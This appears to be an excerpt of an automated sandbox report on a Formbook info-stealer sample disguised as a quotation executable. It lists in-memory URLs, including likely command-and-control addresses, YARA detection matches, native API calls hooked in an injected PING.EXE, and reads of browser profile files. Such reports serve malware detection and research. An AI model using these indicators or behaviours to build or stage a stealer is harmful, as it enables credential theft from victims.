            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: PING.EXE, 00000009.00000003.2645555577.000000000751A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.indeks.space&rand=
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003C6A000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003B1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cs0724sd92jj.cloud/dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000048FA000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4574589636.0000000005A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_ser
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_ne
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_host&
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_cms
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.indeks.space&utm_medium=parking&utm_cam
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.indeks.space&amp;reg_source=parking_auto

            E-Banking Fraud

            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Quotation-27-08-24.exe
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0042C443 NtClose,4_2_0042C443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2B60 NtClose,LdrInitializeThunk,4_2_00FA2B60
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00FA2C70
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00FA2DF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA35C0 NtCreateMutant,LdrInitializeThunk,4_2_00FA35C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA4340 NtSetContextThread,4_2_00FA4340
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA4650 NtSuspendThread,4_2_00FA4650
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2AF0 NtWriteFile,4_2_00FA2AF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2AD0 NtReadFile,4_2_00FA2AD0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2AB0 NtWaitForSingleObject,4_2_00FA2AB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2BF0 NtAllocateVirtualMemory,4_2_00FA2BF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2BE0 NtQueryValueKey,4_2_00FA2BE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2BA0 NtEnumerateValueKey,4_2_00FA2BA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2B80 NtQueryInformationFile,4_2_00FA2B80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2CF0 NtOpenProcess,4_2_00FA2CF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2CC0 NtQueryVirtualMemory,4_2_00FA2CC0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2CA0 NtQueryInformationToken,4_2_00FA2CA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2C60 NtCreateKey,4_2_00FA2C60
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2C00 NtQueryInformationProcess,4_2_00FA2C00
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2DD0 NtDelayExecution,4_2_00FA2DD0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2DB0 NtEnumerateKey,4_2_00FA2DB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2D30 NtUnmapViewOfSection,4_2_00FA2D30
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2D10 NtMapViewOfSection,4_2_00FA2D10
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2D00 NtSetInformationFile,4_2_00FA2D00
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2EE0 NtQueueApcThread,4_2_00FA2EE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2EA0 NtAdjustPrivilegesToken,4_2_00FA2EA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2E80 NtReadVirtualMemory,4_2_00FA2E80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2E30 NtWriteVirtualMemory,4_2_00FA2E30
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2FE0 NtCreateFile,4_2_00FA2FE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2FB0 NtResumeThread,4_2_00FA2FB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2FA0 NtQuerySection,4_2_00FA2FA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2F90 NtProtectVirtualMemory,4_2_00FA2F90
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2F60 NtCreateProcessEx,4_2_00FA2F60
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2F30 NtCreateSection,4_2_00FA2F30
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA3090 NtSetValueKey,4_2_00FA3090
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA3010 NtOpenDirectoryObject,4_2_00FA3010
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA39B0 NtGetContextThread,4_2_00FA39B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA3D70 NtOpenThread,4_2_00FA3D70
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA3D10 NtOpenProcessToken,4_2_00FA3D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C14340 NtSetContextThread,LdrInitializeThunk,9_2_02C14340
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C14650 NtSuspendThread,LdrInitializeThunk,9_2_02C14650
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12AD0 NtReadFile,LdrInitializeThunk,9_2_02C12AD0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12AF0 NtWriteFile,LdrInitializeThunk,9_2_02C12AF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_02C12B60 NtClose,LdrInitializeThunk,9_2_02C12B60
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12EE0 NtQueueApcThread,LdrInitializeThunk,9_2_02C12EE0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12FE0 NtCreateFile,LdrInitializeThunk,9_2_02C12FE0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12FB0 NtResumeThread,LdrInitializeThunk,9_2_02C12FB0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12F30 NtCreateSection,LdrInitializeThunk,9_2_02C12F30
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_02C12CA0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12C60 NtCreateKey,LdrInitializeThunk,9_2_02C12C60
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_02C12C70
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12DD0 NtDelayExecution,LdrInitializeThunk,9_2_02C12DD0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_02C12DF0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12D10 NtMapViewOfSection,LdrInitializeThunk,9_2_02C12D10
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_02C12D30
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C135C0 NtCreateMutant,LdrInitializeThunk,9_2_02C135C0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C139B0 NtGetContextThread,LdrInitializeThunk,9_2_02C139B0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12AB0 NtWaitForSingleObject,9_2_02C12AB0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12BE0 NtQueryValueKey,9_2_02C12BE0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12BF0 NtAllocateVirtualMemory,9_2_02C12BF0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12B80 NtQueryInformationFile,9_2_02C12B80
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12BA0 NtEnumerateValueKey,9_2_02C12BA0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12E80 NtReadVirtualMemory,9_2_02C12E80
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12EA0 NtAdjustPrivilegesToken,9_2_02C12EA0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12E30 NtWriteVirtualMemory,9_2_02C12E30
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12F90 NtProtectVirtualMemory,9_2_02C12F90
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12FA0 NtQuerySection,9_2_02C12FA0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12F60 NtCreateProcessEx,9_2_02C12F60
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12CC0 NtQueryVirtualMemory,9_2_02C12CC0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12CF0 NtOpenProcess,9_2_02C12CF0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12C00 NtQueryInformationProcess,9_2_02C12C00
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12DB0 NtEnumerateKey,9_2_02C12DB0
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C12D00 NtSetInformationFile,9_2_02C12D00
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C13090 NtSetValueKey,9_2_02C13090
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C13010 NtOpenDirectoryObject,9_2_02C13010
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C13D70 NtOpenThread,9_2_02C13D70
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_02C13D10 NtOpenProcessToken,9_2_02C13D10
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_00498B10 NtCreateFile,9_2_00498B10
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_00498C80 NtReadFile,9_2_00498C80
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_00498D70 NtDeleteFile,9_2_00498D70
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_00498E10 NtClose,9_2_00498E10
            Source: Quotation-27-08-24.exe, 00000000.00000002.2128451347.0000000004819000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2131377102.0000000005990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSalmun.dll. vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2118987624.0000000002E30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSalmun.dll. vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2117970440.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2118987624.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSalmun.dll. vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000002.2132326848.0000000009AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000000.00000000.2107622896.0000000000A5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePUQD.exe> vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameping.exej% vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000004.00000002.2470704113.000000000105D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameping.exej% vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exeBinary or memory string: OriginalFilenamePUQD.exe> vs Quotation-27-08-24.exe
            Source: Quotation-27-08-24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Quotation-27-08-24.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, EwT4tW5uadbjQJAJ5v.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: _0020.SetAccessControl
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: _0020.AddAccessRule
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, EwT4tW5uadbjQJAJ5v.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, EwT4tW5uadbjQJAJ5v.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: _0020.SetAccessControl
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: _0020.AddAccessRule
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: _0020.SetAccessControl
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs Security API names: _0020.AddAccessRule
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@15/14
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation-27-08-24.exe.log
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Mutant created: NULL
            Source: C:\Windows\SysWOW64\PING.EXE File created: C:\Users\user\AppData\Local\Temp\Z426iIL7
            Source: Quotation-27-08-24.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Quotation-27-08-24.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
